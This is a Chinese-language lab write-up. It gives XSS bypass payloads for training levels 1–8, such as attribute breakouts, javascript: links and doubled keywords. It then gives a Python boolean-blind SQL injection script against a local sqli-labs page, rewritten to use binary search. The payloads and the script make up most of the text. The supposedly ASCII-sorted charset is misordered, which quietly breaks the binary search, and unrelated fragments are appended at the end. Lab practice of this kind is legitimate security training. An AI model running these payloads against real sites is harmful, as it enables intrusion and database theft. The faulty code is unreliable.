靶場闖關1~8
1.
在url后的name后輸入payload
?name=<script>alert(1)</script>
2.
嘗試在框中輸入上一關的payload,發現并沒有通過,此時我們可以點開頁面的源代碼看看我們輸入的值被送到什么地方去了
從圖中可以看到,我們輸入的值被送到input標簽里的value值中去了,這個時候可以先嘗試先閉合value,輸入payload
3.
嘗試輸入第一關的payload
失敗
再嘗試一下第二關的思路,閉合標簽
發現了這個頁面把<、>這樣的敏感字符編碼成了html字符實體及其他符號都進行了實體化,都用htmlspecialchars()函數進行了處理。此時我們可以使用使用無引號事件
4.
還是按照之前幾個題的思路來處理
發現這個頁面吧<script></script>的“<”">"過濾了,此時可以嘗試
" onmouseover=alert(1) x="
5.
依舊老方法
發現這個頁面將<script></script>的script中插入了下劃線變成了scr_ipt且可以讓標簽正常閉合,我們可以嘗試進行雙寫,大寫等進行嘗試,發現都不可以,此時我們可以使用a標簽進行嘗試
"><a href=javascript:alert(1)>alert</a>
點擊alert過關
6.
老方法
"><sCRipt>alert(1)</sCRipt>
7.
老方法
可以看出,這里存在小寫檢測,把檢測出來的on、script、href給刪了,這時我們可以嘗試一下雙寫
"><scrscriptipt>alert(1)</scrscriptipt>
8.
老方法
從圖中可以看出,這次我們輸入的值被傳入了兩個地方,而且我們前幾關的方法不可以,此時我們可以使用Unicode編碼的方式來看看能不能繞過,可以前往錘子在線工具網 - 首頁這個網站前去編碼
點擊友情鏈接過關
二、利用python實現自動化布爾盲注的代碼優化(利用二分查找)
源代碼:
import requests# 目標URL
url = "http://127.0.0.1/sqli/Less-8/index.php"# 要推斷的數據庫信息(例如:數據庫名)
database_name = ""# 字符集(可以根據需要擴展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推斷數據庫名的長度def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50: # 防止無限循環breakreturn 0# 推斷數據庫名def get_database_name(length):db_name = ""for i in range(1, length + 1):for char in charset: payload = f"1' AND (SELECT substring(database(), {i}, 1) = '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:db_name += charbreak # 找到正確字符后跳出內層循環return db_name# 主函數
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")修改字符集為有序形式,即為了使用二分查找,需要將字符集按 ASCII 順序排序:
charset = " 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-.abcdefghijklmnopqrstuvwxyz"然后寫出實現二分查找的函數(對于長度和字符的推斷,分別實現兩個二分查找函數)?
def get_database_length():low, high = 1, 50while low <= high:mid = (low + high) // 2payload = f"1' AND (SELECT length(database()) <= {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:high = mid - 1else:low = mid + 1return low if low <= 50 else 0def get_database_name(length):db_name = ""for i in range(1, length + 1):low, high = 0, len(charset) - 1while low <= high:mid = (low + high) // 2current_char = charset[mid]# 檢查當前字符是否大于或等于目標字符payload = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) <= ASCII('{current_char}')) -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:high = mid - 1else:low = mid + 1if low < len(charset):db_name += charset[low]return db_name接下來將兩個函數的判斷條件統一為"You are in";為了更好地了解當前的執行進度,可以在每次成功推斷一個字符后打印進度:
print(f"Progress: [{db_name.ljust(length, '.')}] {i}/{length}", end='\r')修改過后的完整代碼:
import requests# 目標URL
url = "http://127.0.0.1/sqli/Less-8/index.php"# 要推斷的數據庫信息(例如:數據庫名)
database_name = ""# 字符集(按ASCII順序排列)
charset = " 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_-.abcdefghijklmnopqrstuvwxyz"# 推斷數據庫名的長度
def get_database_length():low, high = 1, 50while low <= high:mid = (low + high) // 2payload = f"1' AND (SELECT length(database()) <= {mid}) -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:high = mid - 1else:low = mid + 1return low if low <= 50 else 0# 推斷數據庫名
def get_database_name(length):db_name = ""for i in range(1, length + 1):low, high = 0, len(charset) - 1while low <= high:mid = (low + high) // 2current_char = charset[mid]# 檢查當前字符是否大于或等于目標字符payload = f"1' AND (SELECT ASCII(SUBSTRING(database(), {i}, 1)) <= ASCII('{current_char}')) -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:high = mid - 1else:low = mid + 1if low < len(charset):db_name += charset[low]print(f"Progress: [{db_name.ljust(length, '.')}] {i}/{length}", end='\r')print() # 換行return db_name# 主函數
if __name__ == "__main__":try:print("正在推斷數據庫長度...")length = get_database_length()if length > 0:print(f"Database length: {length}")print("正在推斷數據庫名...")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")except requests.exceptions.RequestException as e:print(f"請求異常: {e}")except Exception as e:print(f"發生錯誤: {e}") RunnableBindingBase 深度剖析:給 Runnable“穿衣服“ 的裝飾器架構)
)
)
- cosyvoice2)
)
